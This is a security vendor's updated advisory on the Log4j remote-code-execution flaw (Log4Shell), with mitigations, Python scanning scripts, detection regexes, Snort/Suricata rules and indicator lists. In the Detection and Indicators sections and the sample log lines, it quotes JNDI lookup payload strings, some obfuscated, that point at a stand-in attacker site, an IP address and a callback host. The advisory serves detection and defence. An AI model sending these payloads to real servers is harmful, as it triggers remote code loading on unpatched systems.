Threat Advisory: Apache Log4j RCE – UPDATE

Dec 16, 2021
Written by Davinsi Labs

Scope of the vulnerability

A significant number of Java-based applications use log4j as their logging utility. In Apache Log4j 2 versions <=2.14.1, the JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0 onwards, this behavior is disabled by default.

Versions Affected

CVE | Description | Affected Versions
CVE-2021-44228 | Apache Log4j RCE | All log4j-core versions >=2.0-beta9 and <=2.14.1

Please note that version 2.15.0 is also vulnerable, under specific conditions, to a DoS attack (CVE-2021-45046).

Not Affected

Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against RCE by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false.

Remediation

Upgrade to the latest version (see Apache Releases Log4j). We recommend urgent patching using emergency patching procedures.

Mitigation

releases >=2.10

  • Set the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.

releases >=2.7 to <=2.14.1

  • All PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m.

releases >=2.0-beta9 and <=2.10.0

  • Remove the JndiLookup class from the classpath:
    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
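As an added example (not part of the original advisory), the following Python script checks a log4j-core JAR against the affected range given under Versions Affected and reports whether JndiLookup.class is still present, i.e. whether the class-removal mitigation for the older releases was actually applied. It reads the version from the JAR manifest so renamed JARs are handled too; the JARs it inspects are constructed in a temporary directory, not real Log4j builds.

```python
"""Checks log4j-core JARs for the affected range (>=2.0-beta9, <=2.14.1) and for the
presence of JndiLookup.class. Added example for this advisory; sample JARs are constructed."""
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
VERSION_RE = re.compile(r"(\d+(?:\.\d+){1,2})(?:-beta(\d+))?")
# Version tuples are (major, minor, patch, beta); finals carry beta = inf so 2.0-beta9 < 2.0 < 2.0.1.
AFFECTED_LOW, AFFECTED_HIGH = (2, 0, 0, 9), (2, 14, 1, float("inf"))

def parse_version(text: str):
    """'2.0-beta9' -> (2, 0, 0, 9); '2.14.1' -> (2, 14, 1, inf); None if no version is found."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    parts = [int(p) for p in m.group(1).split(".")] + [0, 0]
    beta = int(m.group(2)) if m.group(2) else float("inf")
    return (*parts[:3], beta)

def inspect_jar(path: Path) -> dict:
    """Prefer the manifest's Implementation-Version (covers renamed JARs) over the file name."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace") if "META-INF/MANIFEST.MF" in names else ""
    m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
    version = parse_version(m.group(1) if m else path.name)
    affected = version is not None and AFFECTED_LOW <= version <= AFFECTED_HIGH
    return {"jar": path.name, "version": version, "affected_range": affected,
            "jndi_lookup_present": JNDI_LOOKUP in names,
            "needs_action": affected and JNDI_LOOKUP in names}

def make_sample_jar(directory: Path, version: str, jndi_removed: bool) -> Path:
    """Constructed stand-in for a log4j-core JAR: a manifest plus an optional class entry."""
    path = directory / f"log4j-core-{version}.jar"
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if not jndi_removed:
            jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
    return path

def demo() -> list:
    """Unpatched 2.14.1, 2.10.0 with the class removed, 2.0-beta8 (before range), 2.15.0 (after)."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        jars = [make_sample_jar(d, "2.14.1", False), make_sample_jar(d, "2.10.0", True),
                make_sample_jar(d, "2.0-beta8", False), make_sample_jar(d, "2.15.0", False)]
        return [inspect_jar(j) for j in jars]
```

Only the first JAR needs action; the 2.15.0 result reflects the RCE range only, so the DoS issue in 2.15.0 (CVE-2021-45046) still calls for the upgrade recommended above.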

Detection

Most attacks seen so far are mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern:

${jndi:ldap://[attacker site]/a}

Log4Shell exploitation can be detected through reverse proxy, WAF and web-server logs.

As a quick detection rule, monitor incoming web requests that contain one of the strings "jndi" or "${::-" and that were allowed through by your security appliance. The regex provided by CERT-EU can be used as well to take obfuscation into account, as seen in the user agents in the IOC list below:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*(?1)}*|('|"|`)*}*){9,11}

If any matches are found, decode the base64-encoded payload (if present) and determine whether a successful, allowed connection to the IOC in the payload was seen. Whether or not an outbound connection from the source host was seen, we still recommend going through the hunting methodologies below to identify any log4j post-exploitation activity.
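The following Python script is an added example, not code from the original advisory or from CERT-EU: it applies the same idea as the regex above in a readable, testable form, resolving the ${::-x} and ${lower:x} obfuscations listed in the IOC section back to the literal jndi lookup and extracting the callback host that the outbound-connection check needs. The log lines and hosts in it are constructed (TEST-NET addresses and .invalid names).

```python
"""Flags Log4Shell (CVE-2021-44228) lookups in web-server log lines, resolving the
${::-x} and ${lower:x} obfuscations from the IOC list, and extracts the JNDI callback
host for the follow-up outbound-connection check. Added example, not from the post."""
import re
from urllib.parse import urlsplit

# ${<lookup>:<key>:-<default>} with an empty lookup and key resolves to <default>.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}:]*:[^{}:]*:-([^{}]*)\}")
# ${lower:x} / ${upper:x} resolve to the case-changed argument.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
# Canonical form once normalised: ${jndi:<scheme>://<host>[:port]/<path>}
JNDI_URL = re.compile(r"\$\{jndi:([a-z]+)://([^}\s]*)", re.IGNORECASE)

SAMPLE_ACCESS_LOG = [  # constructed combined-format lines; TEST-NET and .invalid hosts
    '198.51.100.10 - - [14/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.11 - - [14/Dec/2021:10:01:05 +0000] "GET /?q=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.12 - - [14/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://probe.example.invalid/x}"',
    '198.51.100.13 - - [14/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:${lower:l}${lower:d}a${lower:p}://203.0.113.9/y}"',
]


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups from the inside out until the string stops changing."""
    for _ in range(max_rounds):
        new = DEFAULT_LOOKUP.sub(r"\1", text)
        # getattr picks str.lower or str.upper according to the lookup name
        new = CASE_LOOKUP.sub(lambda m: getattr(m.group(2), m.group(1).lower())(), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_callbacks(line: str) -> list:
    """Return (scheme, host) pairs for every JNDI lookup found in one log line."""
    hits = []
    for scheme, rest in JNDI_URL.findall(normalize_lookups(line)):
        host = urlsplit(f"{scheme.lower()}://{rest}").hostname or rest
        hits.append((scheme.lower(), host))
    return hits


def scan_log(lines: list) -> dict:
    """Map 1-based line numbers to the callbacks found; clean lines are omitted."""
    hits = {n: find_jndi_callbacks(line) for n, line in enumerate(lines, start=1)}
    return {n: h for n, h in hits.items() if h}
```

Web servers usually log the request line percent-encoded, so apply urllib.parse.unquote to each line before scanning if the lookup arrives in the URL rather than in a header.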

Log4Shell exploitation can be detected through application logs.

Monitor application logs of devices vulnerable to log4j for the following signs of compromise:

  1. sun.jndi.
  2. com.sun.jndi.dns.DnsContext
  3. com.sun.jndi.ldap.LdapCtx
  4. Error looking up JNDI resource

Aside from this, WAF, Snort and Suricata rules based on the following source may also detect and prevent incoming Log4Shell attempts:

Furthermore, many security vendors have already created detection rules to detect and prevent Log4Shell exploitation. Contact your security vendors to receive a list of signatures already in place to detect related activity.

Security Vendor | Log4j-related Signatures
Palo Alto | 91991, 91994, 91995, 92001
Checkpoint | Mentioned in the Checkpoint logs as 'CVE-2021-44228'
F5 | 200104768, 200104769, 200004450, 200004451, 200004474, 200104770, 200104771
Fortinet | 121, 126


Hunting

Network logs and forward proxy logs come in handy to hunt for post-exploitation activity.

Davinsi Labs performs the following hunts in our SIEM solution:

Title | Description
Outbound Connections to Probing Services – Web Requests | Detects outbound connections to probing services, indicating that a system in your network has been scanned and is subsequently connecting back to a listening service. The list of probing services is currently based on the Log4Shell exploitation attempts.
Outbound Connections to Probing Services – DNS Query | Detects outbound connections to probing services, indicating that a system in your network has been scanned and is subsequently connecting back to a listening service. The list of probing services is currently based on the Log4Shell exploitation attempts.
Outbound LDAP Traffic | Detects outbound LDAP traffic based on firewall data sources.
Log4Shell related Base64 Encoded strings found | This use case detects base64-encoded strings found in payloads of Log4Shell exploits.
Log4Shell exception strings – Match on raw events | This use case detects exception strings indicating a successful Log4Shell payload.
Security Controls detecting Log4Shell exploitation attempts | This use case triggers on security controls alerting on Log4Shell exploitation attempts.
Blocked Log4Shell Exploit Attempts through iRule | This use case detects blocked Log4Shell attempts through an iRule set by Davinsi Labs & Proximus.


As mentioned by NCC Group, you may also want to hunt for the following:

  • outbound LDAP, LDAPS, RMI, etc. network connections;
  • incoming Java requests.

YARA rules to hunt for Log4Shell can be found at:

Velociraptor artifacts to hunt for Log4Shell are also made public:

Snort / Suricata rules to hunt for Log4Shell (range 2034647-2034717):

  1. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  2. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  3. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  4. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  5. alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  6. alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  7. alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  8. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  9. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  10. alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  11. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
  12. alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)

Indicators of Compromise:

A list of log4j obfuscations seen throughout our customers up until now:

  1. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://
  2. ${jndi:ldap:
  3. ${jndi:${lower:l}${lower:d}a${lower:p}://
  4. ${jndi:ldaps://
  5. ${jndi:dns://
  6. Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@${jndi:ldap://User-Agent.redacted.be.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc
  7. xaKfGZMajk${jndi:ldap://101.99.94.69:80/GUnkoPPRrd}YxlzipjELu

A list of probing services we have identified throughout our customers up until now:


A list of known IOC’s we have identified throughout our customers up until now:


Vulnerability Identification

Our Rapid7 InsightVM customers can now detect the vulnerability via authenticated, agent-based, container, and unauthenticated scans. Rapid7 has released vulnerability checks with the identifiers `apache-log4j-core-cve-2021-44228` and `apache-log4j-core-cve-2021-44228-remote` via a content update on December 12, 2021. The first is an authenticated check, which uses the `find` command on Unix-like systems to identify vulnerable versions of the Log4j JAR files.

Please note that this new check requires the Security Console and Scan Engine to be updated to version 6.6.118, also released on December 12, and will not function with the content-only release. Consoles and Engines will need to be restarted.

The unauthenticated `-remote` check runs during network scans and attempts to trigger a connection back to the Scan Engine in order to determine vulnerable status. It is platform-independent, targeting Windows, Linux, and other operating systems.

The InsightVM product itself uses a log4j library, but not the vulnerable Apache library.

Threat advisory updates

This blog post will be continuously updated in case new findings are published.

Reach out to info@davinsi.com if you need any assistance from our team of security experts.

We hope this threat advisory helps you react quickly to ongoing threats and underlines the need for patching and security monitoring.

Read the previous version: Threat Advisory: Apache Log4j RCE

References
